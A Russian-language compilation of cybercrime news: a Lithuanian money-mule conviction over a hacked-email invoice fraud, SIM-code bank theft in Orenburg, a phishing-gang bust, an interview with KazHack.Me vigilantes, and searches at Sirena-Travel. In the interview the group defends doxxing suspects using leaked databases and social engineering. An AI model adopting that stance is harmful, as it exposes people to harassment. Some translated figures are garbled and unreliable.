T. Шахпароняна также обвиняли в другом мошенничестве, когда он уклонился от уплаты почти 79 000 евро за газовое оборудование для хладагента, но эти обвинения были сняты, поскольку судьи постановили, что невыполнение финансовых обязательств не влечет за собой уголовной ответственности.
В ходе рассмотрения дела было установлено, что 10 апреля 2018 года неустановленные лица взломали сервер электронной почты компании IDH, расположенной в Утрехте, Нидерланды, и функция пересылки позволила хакеру получить доступ к электронной переписке между компанией, расположенной в Лондоне, столице Великобритании, и Фондом BCI, расположенным в Женеве, Швейцария.
Фонд BCI уполномочил компанию IDH, зарегистрированную в Нидерландах, переводить средства от имени Фонда BCI в соответствии с условиями договоров, заключенных от имени Фонда BCI.
Контракт на реализацию и развитие проекта "CottonConnect-Nawabshah, Sindh" был подписан компаниями, расположенными в Лондоне и Женеве, на основании которого Фонду BCI был представлен для оплаты счет на сумму 126 212,40 евро.
Фактически, по этому договору Фонд BCI обязался финансировать реализацию и развитие проекта на общую сумму 210 000 354 евро, которая должна была быть выплачена лондонской компании путем банковских переводов, с частичными выплатами в размере 126 000 евро и 84 000 евро соответственно.
Как только первый счет был предъявлен к оплате, хакер изменил данные счета и заменил бенефициара в Великобритании на литовскую компанию Т. Шахпаронян.
Этот счет был оплачен компанией IDH, расположенной в Нидерландах и действующей по поручению Фонда BCI. Как только деньги поступили на счет бизнесмена из Вильнюса, он перевел большую часть денег - 126 000 евро - в другую свою компанию, и в течение месяца или около того обналичивал деньги, используя их для различных платежей и финансовых операций.
Чиновники установили, что Шахпаронян даже купил на незаконно заработанные деньги лотерейные билеты в надежде, что ему повезет еще больше.
Быстро стало ясно, что деньги не дошли до истинного получателя, но деньги так и не были найдены. Хотя хакеров также не удалось идентифицировать, данные, полученные чиновниками, позволяют предположить, что кибервзломщики, скорее всего, базируются в Нигерии.
В то время Т. Шахпаронян, против которого тогда было возбуждено уголовное дело, уверял, что не имел никаких контактов с грабителями, и что нет никаких доказательств того, что он передал полученные деньги своим сообщникам, которые так и не были установлены.
Бизнесмен также утверждал, что не знал о компаниях в Швейцарии, Великобритании и Нидерландах.
"Тот факт, что я не вернул полученные деньги в фонд BCI, сам по себе не является мошенническим использованием денег", - заявил суду г-н Шахпаронян.
Бизнесмен утверждал, что, по его мнению, деловой партнер из России перевел деньги на счет компании, которой он руководил, за оказанные услуги. Однако не напрямую, а через оффшорную компанию.
"Это обычное дело в бизнесе", - утверждал мужчина, утверждая, что он совершил честную ошибку, получив деньги на счет своей компании, поскольку был уверен, что деньги были переведены его деловым партнером в качестве долга за услуги, ранее оказанные компании.
Однако судьи, оценивавшие данные, собранные в ходе предварительного следствия и судебного процесса, придерживались иного мнения - в деле достаточно доказательств того, что Шахпаронян мошенническим путем получил крупные суммы иностранных денег.
По словам судей, в ходе уголовного разбирательства г-н Шахпаронян утверждал, что не знал точных контактов российского бизнесмена, что он даже никогда не знал его имени, и что их сотрудничество было основано на взаимном доверии, без каких-либо письменных договоров.
"Обычно он не платил за каждую транспортную услугу, которую оказывал компании, которой я руководил, но когда у него была большая сумма, примерно за полгода, я сообщал ему сумму, которую нужно заплатить, и он делал переводы платежей", - рассказал суду бизнесмен. - Российской компании были оказаны услуги на сумму около 80 000 евро, а остальные переведенные деньги - около 46 000 евро - составили прибыль компании".
В подтверждение своей версии событий Шахпаронян пояснил, что российский бизнесмен прислал ему в почтовый ящик договор с фондом BCI до того, как были переведены деньги.
Бухгалтер, работавшая в то время в компании бизнесмена, сказала, что сумма в 126 000 евро, поступившая на счет, была "настолько большой" и удивила ее.
"У компании были контракты только на сумму от 8 000 до 20 000 евро, причем контракты с российскими партнерами заключались нечасто, это были небольшие заказы, не более 1 000 евро", - сказал бухгалтер.
В ходе досудебного расследования чиновники обнаружили на компьютере Шахпарояна многочисленные электронные письма, в которых он переписывался с потенциальными "хакерами". Судьи, оценивавшие эти соответствия, пришли к выводу, что "T. Шахпаронян был выбран на роль денежного мула в этом преступлении, который получает деньги на свой банковский счет (обычно трансграничные денежные переводы), а затем должен перевести их на другой счет или на указанные банковские счета третьих лиц, за что получает вознаграждение (удерживая часть переведенной суммы)".
Судьи даже привели выдержки из переписки Шахпароняна: "<...> Пожалуйста, не могли бы вы прислать мне фотографию счета SEB в Литве, как там был произведен платеж в размере 126 000 евро, и мои люди борются за то, чтобы я убедился, что вы его не получили. Также, пожалуйста, не могли бы вы отправить платеж в Китай, так как это создает мне много проблем и влияет на мой бизнес"; "Пожалуйста, покажите мне выписку из банка. Мы хотим проверить, доступны ли средства на вашем банковском счете"; "<...> Пожалуйста, я могу снять фильм Paysera, чтобы показать парню, стоящему за Paysera, что деньги все еще с вами. Так было раньше, прекрасно<...>".
В нем также цитируются письма, отправленные бизнесмену: "Куда вы перевели наши 126 200 евро?"; "Вы уже связались с П.? Пожалуйста, пришлите мне фотографию 126 200 на вашем счету."; "Где 126 000 евро, которые вы получили на счет SEB в Литве?"; "Пожалуйста, сделайте это сейчас. Обслуживание клиентов в SEB Bank Business".
Кстати, г-н Шахпаронян не спешил выполнять инструкции, и от него потребовали, чтобы это было сделано, если сотрудничество будет поддерживаться в будущем, а также указать страны, в которые должны были осуществляться переводы, и процент, который должен был использоваться в качестве зарплаты для других лиц, вовлеченных в мошенничество.
"Брат, я говорю о твоем литовском "я", если ты не согласен, пожалуйста, верни деньги отправителю, похоже, будут большие проблемы с полицией"; "Привет, брат, я не боюсь полиции, я послал трех человек, чтобы встретиться с тобой. Верните эти деньги в банк, который их отправил. Не стесняйтесь обращаться в полицию"; "Деньги, 126 000 евро, не принадлежат одному клиенту, они принадлежат другому клиенту, вы не можете хранить деньги, которые вам не принадлежат. Я просил вас запомнить предыдущие сделки. Вы не можете хранить эти деньги, потому что банк сообщил об интерполяции"; "Если вы не хотите переводить 50% нашему клиенту, переведите 126 200 евро обратно на ваш банковский счет в SEB и сообщите банку о возврате на счет, с которого они поступили. Отправьте подтверждение, что банк возвращает все деньги на счет, с которого они поступили";
"Наш клиент сообщил нам, что на другой счет был сделан перевод в размере 126 200 евро. Мы не обвиняем Господа в краже, а пытаемся разрешить ситуацию. Мы хотим верить в Господа. Мы не хотим портить многолетнее сотрудничество с нашим африканским клиентом. В прошлом у нас не было таких проблем. В качестве гарантии прошу перевести на наш европейский счет сумму в размере 63 100 евро"; "Мы заинтересованы в дальнейшем сотрудничестве, но при условии, что вы не будете подчеркивать оплаченный вами счет на 126 200 евро, поэтому мы хотим передать эту компанию одному из наших людей"; "Мне сообщили, что единственный выход из этой ситуации - переписать литовскую компанию и счет в SEB BANK на одного из наших партнеров. Мы можем продолжить наше сотрудничество при условии, что мы разрешим эту ситуацию".
По мнению судей, содержание переписки по делу, ссылки на процент акций, принадлежащих другим вовлеченным лицам, сотрудничество в прошлом и в будущем, поддержание сотрудничества и т.д., а также тот факт, что Шахпаронян в одном из электронных писем заявил, что "деньги благополучно прибыли в Нигерию в апреле", подтверждает тот факт, что он работал вместе с лицами, взломавшими сервер IDH.
"На основании собранных по данному делу доказательств достоверно установлено, что преступное деяние Т. Шахпароняна (мошенничество в отношении фонда BCI) было совершено в сотрудничестве с другими неустановленными лицами, при предварительном согласовании с ними и разделении задач", - говорится в приговоре Вильнюсского краевого суда. - Причастность Т. Шахпароняна к уголовному преступлению выразилась в том, что, зная о том, что компания, на банковский счет которой была переведена сумма в размере 126 212,40 евро, никак не связана с Фондом BCI или проектом, финансируемым Фондом BCI, и зная о происхождении денег (проведенной (или проводимой) финансовой афере), а также не имея законных и реальных оснований для появления денежных средств на банковском счете своей компании, т.е. Он не сообщил о получении денег в правоохранительные органы и не вернул их фонду BCI, зная, что они являются иностранным активом для него или возглавляемой им компании.
Напротив, на следующий день после получения денег он перевел их на другой счет, принадлежащий его компании, и использовал их в своих целях и в интересах других лиц (физических, юридических): обналичивал, делал переводы своим клиентам, которым он задолжал деньги, выплачивал своим работникам просроченную зарплату и т.д.".
Судебная палата отметила, что Т. Шахпаронян совершил преступление против собственности с прямым умыслом, с целью получения материальной выгоды, и что преступление причинило значительный имущественный ущерб, который не был возмещен.
Г-н Шахпаронян также имеет судимость за тяжкое имущественное преступление - кражу крупной суммы денег, а в январе он был осужден судом за незаконный сбор информации о своей бывшей жене.
• Source: [https://www.delfi.lt/news/daily/lit...auzeliams-talkines-pinigu- mulas.d?id=86594605](https://www.delfi.lt/news/daily/lithuania/lietuvoje- ikliuvo-svetimus-duomenis-pasisavinusiems-isilauzeliams-talkines-pinigu- mulas.d?id=86594605)
Дзержинский районный суд города Оренбурга огласил приговор местному жителю, которого признали виновным в кражах с банковских счетов граждан.
В ходе расследования уголовного дела, возбужденного по признакам преступления, предусмотренного ст. 158 УК РФ «Кража» и ст. 174.1 УК РФ «Легализация (отмывание) денежных средств или иного имущества, приобретенных лицом в результате совершения им преступления», следователем Следственного управления УМВД России по Оренбургской области было установлено, что работник телекоммуникационной компании скопировал идентификационные коды СИМ-карт абонентов одного из операторов мобильной связи. После увольнения, не имея постоянного заработка и обладая специальными познаниями в сфере IT-технологий, отправлял сообщения на единый номер обслуживания клиентов одного из банков. В случае привязки банковской карты к телефону переводил денежные средства граждан на подконтрольные ему счета, а затем конвертировал их в криптовалюту.
От действий злоумышленника пострадали 124 человека, ущерб превысил один миллион рублей.
Дзержинский районным судом мужчина приговорен к 3,5 годам лишения свободы с отбыванием в исправительной колонии общего режима, а также с ограничением свободы на один год и штрафом в 150 000 рублей в доход государства.
Совместная [операция](https://www.politie.nl/nieuws/2024/december/6/07-internationaal- cybercrimenetwerk-opgerold.html) спецслужб Бельгии и Нидерландов привела к задержанию восьми подозреваемых, причастных к масштабным телефонным мошенничествам. В рамках операции было проведено 17 обысков в различных районах Бельгии и Нидерландов.
Преступники использовали фишинговые ссылки в электронных письмах, сообщениях в мессенджерах и SMS, заманивая жертв на поддельные банковские сайты. Введённые данные использовались для последующего обмана: жертвам звонили от имени «сотрудников банка» или «команды по борьбе с мошенничеством», убеждая в необходимости помощи. Таким образом преступники опустошали банковские счета, нанося ущерб, оцениваемый в миллионы евро.
Для осуществления операций преступники арендовали элитные квартиры и использовали их как колл-центры. Основной целью становились пожилые люди, которых иногда посещали прямо на дому. Большинство преступлений происходило в Бельгии, но главные организаторы находились в Нидерландах.
На украденные деньги преступники покупали дорогие часы, украшения и устраивали вечеринки в элитных клубах. Свою «успешную» жизнь активно демонстрировали в социальных сетях, иногда публикуя фотографии с известными личностями для повышения статуса. В одной из обнаруженных переписок преступники хвастались, что обманывали даже пожилых людей. Манипуляции строились на точных знаниях о психологических слабостях жертв. В случаях неудачи мошенники не стеснялись грубости и оскорблений в адрес собеседников.
По данным следствия, пострадали жители минимум 10 европейских стран, а общий ущерб составил несколько миллионов евро. Полиции удалось изъять люксовые аксессуары и наличные деньги, электронные устройства, а также огнестрельное оружие.
Расследование началось ещё в 2022 году в Бельгии. Позже подключились нидерландские следователи, так как главные подозреваемые оказались гражданами Нидерландов. Европол и Евроюст [помогали](https://www.europol.europa.eu/media- press/newsroom/news/international-operation-against-phone-phishing-gang-in- belgium-and-netherlands) координировать действия полиции двух стран и предоставляли аналитическую поддержку.
Количество наркопреступлений в Казахстане растёт с каждым годом. Тюрьмы переполнены закладчиками и варщиками, а реабилитационные центры — молодыми людьми, тяжело зависимыми от синтетических наркотиков. В то же время организаторы наркошопов легко уклоняются от ответственности и продолжают свою деятельность в Сети. Ситуацию пытаются изменить казахстанские хакеры из группы KazHack.Me, уже несколько лет раскрывают деятельность наркоторговцев, оставаясь при этом анонимными. В работе они используют методы, зачастую находящиеся на грани закона. Подробнее о «серых» хакерах, их методах, а также о том, почему они взялись ещё и за педофилов, — в материале Orda.kz.
Мы взяли интервью у членов группы. Они пожелали и дальше оставаться анонимными.
Почему вы начали борьбу с наркоторговцами и наркомаркетплейсами? И как давно вы уже этим занимаетесь?
— Задумываться о проблемах с наркотиками в нашей стране мы начали года четыре назад. Каждый день, гуляя по городу, мы то и дело сталкивались с надписями на стенах, рекламирующими наркошопы. Обычно простые люди не замечают их, но стоит один раз увидеть — и вы начинаете примечать их постоянно. Даже на детских площадках и в школах. Кроме того, мы вдруг осознали, что у каждого из нас есть родственник или близкий человек, который пострадал от наркотиков. Кто-то подсел на них и скатился по жизни, а кто-то сам стал закладчиком, пытаясь решить свои финансовые проблемы быстрым способом, но вместо этого оказался в тюрьме и выйдет ещё очень не скоро...
Наблюдая всё это каждый день, мы увидели растущую угрозу, которая больше и больше нарастает в нашей стране. Когда ты понимаешь, что ты можешь хоть что-то изменить, просто нет сил стоять в стороне.
Расскажите о вашей команде. Сколько человек в ней и как вы организованы?
— За четыре года наш состав постоянно менялся — приходили новые люди, кто-то уходил. Более того, у нас есть много помощников, которые не состоят в нашей команде, но на регулярной основе оказывают ту или иную поддержку. Что же касается основного ядра нашей команды, это пять-семь человек на данный момент.
Как ваша борьба с преступностью в Сети влияет на вашу профессиональную жизнь вне этого занятия? Сталкивались ли вы с проблемами на работе из-за этого?
— Конечно, самое большое влияние — это время. Его всегда не хватает, ведь у каждого из нас есть личная жизнь, работа. Кто-то сам по себе фрилансер, и ему проще, а кто-то работает по графику и может уделять время нашей деятельности лишь по вечерам. Совместить такое очень сложно, но приходится. Каких-то серьёзных проблем на работе никто не испытывал, ведь мы стараемся, чтобы наша борьба с наркотиками никак не пересекалась с другой деятельностью, в первую очередь, по причине безопасности.
Не боитесь ли вы за свою безопасность и безопасность близких?
— Конечно, какой-то страх всегда присутствует. Ведь мы отлично понимаем, что наши враги обладают большими финансовыми возможностями, большими связями, в том числе и в органах. Если мы можем находить их, даже тех, кто очень хорошо заботится о своей анонимности, то что мешает рано или поздно им выйти на нас? Мы всегда держим это в памяти и стараемся всегда ставить свою безопасность на первое место, ведь в противном случае это может вылиться в большие беды, в том числе и для наших родных.
Были ли случаи, когда наркомафия пыталась вычислить кого-то из вашей команды?
— За последний год мы неоднократно становились свидетелями различных попыток нас деанонимизировать. Большинство методов нам прекрасно знакомы, и мы сразу их видим. Но порой они идут на хитрости, вступают с нами в переписку, пытаются втереться в доверие, маскируются под представителей органов, чтобы вытащить из нас информацию. Однако мы всегда уделяем максимальное внимание всем, с кем контактируем, и стараемся не вестись на их уловки.
Опять-таки в целях безопасности мы стараемся как можно меньше рассказывать своему окружению о том, чем мы занимаемся. Лишь некоторые наши ребята решились раскрыться перед своими близкими родственниками. Конечно, они их поддерживают, хотя и очень опасаются, что наша деятельность в итоге может привести к печальным последствиям... Поэтому всё же лучше не делиться совсем ни с кем, кроме «своих». Так мы сможем обезопасить и себя, и своих близких.
Сколько наркомаркетплейсов работает в Казахстане, и как они уклоняются от блокировок?
— Назвать точное количество невозможно, но это тысячи. И буквально каждый день в каком-то городе открывается новый наркошоп. Конечно, далеко не все из них достигают успеха и остаются на наркосцене, но огромный спрос на наркотики, который только продолжает расти, побуждает открываться всё новые и новые шопы. Обычно они занимаются продажей в Telegram.
Порой их чаты и боты блокируются администрацией, но это лишь наносит небольшой финансовый ущерб. Очень скоро они создают другие и быстро возвращают себе старых клиентов. Более эффективно выглядит блокировка банковских карт, на которые принимается оплата за наркотики. Здесь уже ущерб более весомый. Хотя более-менее крупные шопы стараются выводить все средства со своих публичных карт ежедневно: если повезёт, можно заставить их потерять пару сотен тысяч, а то и миллион тенге.
Но это лишь создаёт некую головную боль или задержки в зарплате на пару дней. Каких-то эффективных массовых блокировок Telegram-каналов или карт пока не существует, к сожалению. Однако мы тоже задумывались над этим вопросом и методами, которые помогут улучшить этот вариант борьбы с наркошопами. Возможно, в будущем мы сможем предоставить такой инструмент.
Были ли случаи, когда враждующие между собой наркошопы пытались использовать вас в своей войне?
— Да, это происходит регулярно. Немалая часть нашей работы — это обработка сливов, которые нам поступают от наших подписчиков. Частенько это могут быть люди, которые случайно узнали какие-то данные на наркодельцов от знакомых или, например, записали закладчика на камеру. Но чаще всего, конечно, наши информаторы являются такими же преступниками, против которых мы и работаем. Они хотят избавиться от своих конкурентов и сливают их нам. У нас даже был случай, когда практически одновременно два враждующих магазина стали сливать инфу друг на друга, и сейчас они оба находятся на изучении в правоохранительных органах. В принципе, мы не против таких случаев, какую цель бы ни преследовал информатор, главное — нанести удар по наркотикам. А кто из них будет раньше, а кто позже, это уже не так критично.
Заметили ли вы, что преступники стали более осторожны в интернете из-за вашей деятельности?
— Мы стараемся наблюдать за перепиской во всех популярных наркочатах. В последнее время практически каждый день где-нибудь да всплывает обсуждение нашего канала. Барыги прямым текстом угрожают слить друг друга нам, обсуждают наши посты и пытаются угадать, в чём просчитался их «коллега» и как бы самим не допустить такую оплошность. Однако прямого такого массового усиления своей анонимности мы не наблюдали. Те, кто поумнее, они и до нас старались быть ниже травы, а остальные и сейчас особо не парятся.
Не затруднит ли это работу правоохранительных органов?
К сожалению, в техническом плане наши правоохранительные органы пока отстают. У них нет навыков и специальных инструментов, которыми они могли бы эффективно выявлять преступников в Сети.
Поэтому мы и стараемся использовать свои возможности в сотрудничестве с полицией, чтобы объединить их методы с нашими. Радует, что развитие в органах всё-таки есть. Например, относительно недавно в нашей стране появился киберпол, где сотрудники являются не просто полицейскими, а техническими специалистами. Но нужно, конечно, это ещё развивать и набираться опыта.
Так вы сотрудничаете с полицией?
— Сейчас мы видим, как растёт количество сотрудников правоохранительных органов, которые самостоятельно выходят с нами на контакт. Это не только УПН, но и КНБ, Киберпол, АФМ. Это говорит о том, что мы наконец-то смогли доказать, что мы не только хотим, но и можем эффективно поддерживать их.
Но так было не всегда. Вообще, конечно, с самого начала мы пытались наладить контакты с полицией. Но на протяжении первой пары лет это вообще не давало никаких результатов. И только полтора года назад стали появляться сотрудники, которые действительно хотят работать с нами. Очень радует, что есть те, кому небезразлична его собственная работа и кто делает её не ради галочки, а искренне радеет за своё дело.
Вообще мы лишь недавно смогли заручиться контактами из органов в большинстве областей Казахстана. Но до сих пор есть регионы, в которых у нас нет никого, кому мы могли бы передать сведения. Очень надеемся, что в ближайшее время ситуация начнёт улучшаться, по крайней мере, мы видим такую тенденцию. Что касается эффективности их борьбы, то если брать именно тех, с кем мы общаемся, то многих мы можем оценить очень положительно. Конечно, есть те, кто не очень охотно идёт на контакт, хочет лишь получить от нас информацию, а не работать по ней совместно и без обратной связи. Кому-то, видно, просто поручили с нами связаться, он сделал это, отметился и забыл. Но таких мало.
Если говорить об эффективности в целом, то её на самом деле сложно оценить. Ведь, с одной стороны, мы видим абсолютный рост наркотиков, десятки тысяч преступников обладают сверхуверенностью в собственной безнаказанности. Но, с другой стороны, мы и не можем видеть того, какую именно работу делают полицейские. С тех пор, как мы стали активно общаться с ними, они стали делиться с нами и своими буднями. Мы видим, что многие не сидят без дела, они постоянно накрывают лаборатории, перехватывают сотни килограммов наркотиков, и далеко не обо всех таких операциях пишут в СМИ. Чем больше мы изучаем эту проблему изнутри, тем больше видим, насколько глубоко она засела в нашей стране и насколько сложно будет с ней бороться.
Пытались ли полицейские раскрыть вас?
— Когда мы только начинали привлекать внимание, очень удручал тот факт, что вместо плодотворного сотрудничества к нам относились как к преступникам. Мы пытались связываться с полицией, выходили с ними на контакт, передавали им сведения, а они всё равно пытались всеми силами сделать упор на то, чтобы вытянуть нас на встречу, определить, где мы живём. Конечно, кто-то и сейчас пытается, такая уж у них работа. Поэтому нам приходится скрываться не только от наркошопов, но и от представителей правопорядка.
Каким вашим достижением в хактивизме вы гордитесь больше всего? Поделитесь кейсом?
— Сложно выделить какой-то один кейс. Наверное, самое главное, что мы смогли развить наше движение и привлечь внимание к этой проблеме. Можем поделиться одним забавным случаем, о котором нигде ещё не писали. Нам удалось полностью остановить работу одного наркошопа, вообще не прикладывая абсолютно никаких усилий. Как-то с нами связался незнакомый человек и рассказал, что он осознаёт, что мы сидим у него на хвосте и вот-вот вычислим. Самое забавное, что мы понятия не имели, кто это. Но мы подыграли ему, сделали пару намёков, и он окончательно убедился, что мы его якобы вычислили. Как итог — он пообещал выйти из дела, удалил канал и чаты своего магазина и рассказал, какой легальной деятельностью займётся.
Впоследствии мы смогли точно понять, кем же на самом деле он является, и получили возможность следить за тем, не вернётся ли он обратно на скользкую дорожку. Почему он подумал, что мы у него на хвосте и как вдруг решил «сдаться»? Возможно, просто сработал страх, что его найдут. И это самое главное, что делает наше движение. Ведь ранее они были практически уверены, что их невозможно найти или посадить, особенно те, кто напрямую не связан с наркотиками, не касается их. Поэтому не было и страха заниматься всем этим. Сейчас же, кто знаком с нашей деятельностью, дважды подумает и взвесит все за и против, прежде чем принять решение заняться продажей наркотиков.
Вы публикуете личные данные подозреваемых, что вызывает споры среди ваших подписчиков и пользователей Казнета. Такой подход этичен?
— Мы считаем, что именно публикация личных данных имеет максимальный эффект. И тут есть множество плюсов. Во-первых, даже если дело вдруг не дойдёт до лучшего финала — заключения преступника за решётку, есть большая вероятность, что он заляжет на дно и прекратит заниматься продажей наркотиков. Ведь теперь об этом знают его родственники, родители и друзья, которые могут оказать правильное давление. Такое уже было на практике и неоднократно.
Во-вторых, такая публичность позволяет избежать тех скользких моментов, которые нередки в нашей стране — преступники могут откупиться. Ведь даже если мы передаём все сведения надёжному сотруднику, которому мы полностью доверяем, и он потом осуществляет слежку и задержание, то дальше уже идут другие сотрудники, судьи, прокуроры, которые могут легко повлиять на ход дела. А когда есть огласка, сделать это гораздо сложнее. Мало кто из оборотней в погонах захочет прочитать в наших постах о барыге, которого мы выявили, а потом он чудесным образом отмазался.
Кроме того, именно огласка позволяет привлечь больше внимания к нашему движению.
Несколько лет назад мы пытались всё делать скрытно, отправляли данные на официальные контакты полиции, но чаще всего даже ответа не получали. А благодаря огласке органам приходится более активно реагировать.
У нас появляются новые подписчики — а это новые источники полезной информации, новые помощники. Не делай мы всё публично, у нас бы ничего не получилось, и многие из тех, кто сейчас сидит за решёткой, по-прежнему были бы на свободе.
Ваша деятельность всегда соответствует закону или вы часто действуете в серой зоне?
— Даже публикация личных данных — это уже не всегда правомерно. Поэтому мы стараемся использовать различные методы, в основном это OSINT — то есть поиск данных в публичных источниках, различных слитых базах и утечках. Часто приходится прибегать к социальной инженерии, это когда в переписке мы вытаскиваем полезные сведения. Все это находится где-то на грани.
Кстати, помогают ли вам подписчики в борьбе с наркомафией?
— Что касается помощи подписчиков, мы получаем её регулярно. Раньше нам самим приходилось искать цели для нашей работы — мы шерстили чаты, гуляли по городу и фотографировали рекламные надписи. Сейчас в этом совсем нет нужды, практически каждый день нам присылают всё новые и новые списки продавцов и рекрутеров, которые пытаются завлечь на работу закладчиков. Более того, многие наши подписчики загорелись активизмом и начали собственную борьбу с наркотиками — они закрашивают надписи в своём городе, внимательнее присматриваются к подозрительным личностям и присылают нам фото и видео закладчиков. Те, кто обладает техническими навыками, помогают нам с решением многих вопросов, на которые пришлось бы тратить дополнительное время — это и написание скриптов, и обслуживание некоторых наших сервисов. Очень радует, что таких помощников с каждым разом становится всё больше и больше.
Почему многие молодые люди становятся закладчиками и варщиками? Они не понимают последствий?
— Конечно, в первую очередь, по нашему мнению, это всё-таки мнимая анонимность. Они считают, что если работать через интернет, их никто и никогда не сможет найти и выследить.
Многие тешат себя тем, что лишь немного поработают, заработают пару миллионов «для мамы», «для детей», «встать на ноги». Но всё это самообман — почувствовав приток лёгких и быстрых денег, они чаще всего тратят их совсем не туда, куда хотели изначально.
Как итог — закладчики и мелкие барыги вечно сидят в долгах, несмотря на огромные доходы.
Они не могут бросить своё дело, так как не видят другого варианта выпутаться из этого омута. Те, кто покрупнее и с гораздо большими доходами, вообще не видят каких-либо препятствий. Они считают, что, занимая руководящие должности и не соприкасаясь с наркотиками, никогда не смогут быть пойманы и наказаны правосудием. В общем, сейчас это слишком легко и просто, любой может стать закладчиком.
У нас даже был случай, когда курьером был человек с инвалидностью на коляске. Возможно, никто бы никогда и не догадался, чем он занимается во время своих прогулок, если бы не мы. Единственный способ стабилизировать ситуацию — поднять уровень раскрываемости этих преступлений, чтобы отбить желание у тех, кто ещё только раздумывает над этим. Что касается того, как уличить своего близкого в связях с наркомафией, то мы сейчас активно прорабатываем этот момент. Мы создаём инструмент, который значительно упростит полицейским, а также родителям или близким друзьям поиск как сотрудников наркошопов, так и самих наркозависимых. Надеемся, что сможем уже в ближайшее время его анонсировать.
Как происходит вербовка? Люди сами ищут такую работу или на них выходят?
— Чаще всего это спам-рассылки в группах Telegram, связанных с поиском работы. Затем идут OLX и уличная реклама. У нас было несколько постов, где мы разоблачили расклейщиков объявлений в разных городах Казахстана, которые под видом легальной работы искали себе закладчиков. Но бывает, что они открытым текстом пишут, кто и для каких целей им нужен. Это что касается закладчиков, разменного ресурса наркошопов. Более ответственные должности, такие как складмены, операторы, чаще всего выбираются из уже знакомых, надёжных людей, которые смогли как-то себя проявить или же смогли отдать хороший депозит в размере от 500 тысяч до трёх млн тенге.
Сейчас вы переключились на педофилов. Собираетесь так же публично разоблачать их, как наркоторговцев?
— Пока мы только изучаем эту тему, хотя многие методы похожи, есть значительное количество нюансов, к которым мы пока не подготовлены, и требуется значительное время, чтобы понять, как правильно выстроить работу в этом направлении. Но да, мы планируем параллельно заниматься деаноном педофилов. Сейчас ещё очень важно установить контакты с правоохранительными органами, которые смогут помочь нам в этих вопросах.
Тут, как оказалось, всё гораздо сложнее — у нас нет специального органа, который мог бы заниматься конкретно этими проблемами. Думаю, уйдёт пара месяцев, пока мы сможем все грамотно обдумать и понять, как двигаться дальше. Но что несомненно, так это то, что мы будем публиковать их личные данные так же, как и с наркошопами. Мы считаем, что это даже важнее, ведь эти люди могут представлять максимальную опасность для нашего общества, угрожая самому ценному, что у нас есть.
Не опасаетесь ли вы, что такой подход может спровоцировать ситуации, когда подозреваемые могут нанести вред себе или окружающим?
— Мы неоднократно обдумывали эти моменты. Перед публикацией данных, если человек ещё не был задержан полицией, мы стараемся всё тщательно обдумать и взвесить, предугадать все возможные исходы. Конечно, всё не предусмотришь, но пока подобных инцидентов не было и, надеюсь, не будет.
Насколько доступен подобный контент в Казнете и активно ли с ним борются уполномоченные органы? Как действуют педофилы в Сети, и как могут родители обезопасить своего ребёнка?
Если говорить о контенте вообще, то получить к нему доступ даже проще, чем к наркотикам. Ведь найти такие материалы в даркнете можно даже не платя денег, если лишь немного поискать.
И борются с этим, как нам кажется, гораздо хуже, чем с наркотиками, если вообще специально как-то работают в этом направлении. Для нас это пока совсем новая тема и не всё ясно о ситуации в целом. Мы уже стали свидетелями того, как педофилы вступают в переписки с детьми до 15 лет, пытаются с ними познакомиться и позвать на встречу. Кстати, такое распространено и в наркосреде.
К сожалению, среди клиентов есть совсем юные подростки, готовые за обещание дозы пойти на встречу с неизвестным человеком. Чтобы защитить своих детей, мы считаем, что родители могут предпринять только одно — установить доверительные отношения со своим ребёнком. Интересоваться, чем он увлекается, какие у него друзья. Не говорим, что надо следить, но проявлять заинтересованность нужно обязательно. И только через доверительные двусторонние отношения можно защитить своего ребёнка от дурного влияния, будь то педофилы, наркотики или ещё какие-либо неприятности.
Возможно ли, на ваш взгляд, полностью очистить Казнет от нелегального контента и наркотиков?
— Конечно, нет. Это как мечта об идеальном мире. Казнет сможет полностью очиститься лишь тогда, когда на его смену придёт более удобный и подходящий инструмент для поглощения этого контента. Всё, что мы можем сделать, — это минимизировать наличие этого контента и усложнить к нему доступ, стараясь при этом не навредить комфорту использования в легальных целях.
Как вы оцениваете безопасность личных данных в нашей стране? Какие недоработки и упущения видите со стороны госорганов и бизнеса?
— Все эти сливы — это побочный эффект всеми любимой цифровизации.
Нам всем нравится, что мы можем так просто оплачивать покупки через интернет, заказывать еду в ресторанах без звонка по телефону, записываться на приём к врачу онлайн. Но никто не задумывается, чем это может быть чревато.
Поэтому всегда нужно помнить, что любую информацию, которую вы оставляете в интернете, рано или поздно может получить злоумышленник.
Не говорим, что стоит отказаться от всех этих благ, нужно просто понимать и всегда держать в голове мысль, что ваши личные данные могут стать известны всем. Чтобы бороться с утечками, мы считаем, что нужно повышать ответственность виновных в этих утечках. Сейчас лучшее, что может произойти, — вам просто объявят о самом факте, и всё. Но наказания никто не понесёт. На самом деле компании, которые допустили такого рода оплошность, должны нести очень суровые наказания в виде штрафов, и такие, которые будут серьёзно бить по их бизнесу. Только так можно заставить их более-менее тщательно следить за данными, которые им доверили наши граждане.
sc:
t.me/KazHack_news/574
orda.kz/zakladchiki-s-invalidnostju-i-ugrozy-ot-baryg-anonimnye-hakery-
vychisljajut-dragdilerov-v-kazahstane-385232/
У разработчика российской системы бронирования Leonardo «Сирена-Трэвэл» (партнер «Ростеха») проходят обыски, сообщили «Ъ» источники на рынке. По данным одного из собеседников, оперативные мероприятия в офисе компании на Ленинградском проспекте проводят сотрудники МВД, ФСБ и Росгвардии.
По словам другого знакомого с ситуацией источника, «действия связаны с масштабными атаками на IT-инфраструктуру российской системы бронирования билетов, с которыми компания столкнулась осенью прошлого года». Компания уведомила правоохранительные органы «об инцидентах в сфере информационной безопасности, предоставляет доступ ко всем необходимым документам и данным в ходе расследования». Он добавил, что правоохранители изучают технику для установления «возможных уязвимостей». Также в офисе, по его словам, происходит выемка документов.
По данным «Ъ», «Сирена-Трэвэл» является арендатором помещения у НИЦ АСК по адресу: Ленинградский проспект, 37. По словам юрисконсульта компании, следственные и оперативные мероприятия к деятельности АО «НИЦ АСК» не имеют никого отношения. Обыски в офисе не проводились, подчеркнула юрист.
«Ъ» направил запрос в «Ростех». В МВД оперативно прокомментировать ситуацию не смогли.
Не исключено, что следственные действия также проводятся в домах фигурантов этого дела: Мещанский суд Москвы 3 апреля разрешил МВД проведение мероприятий в домах двух частных лиц.
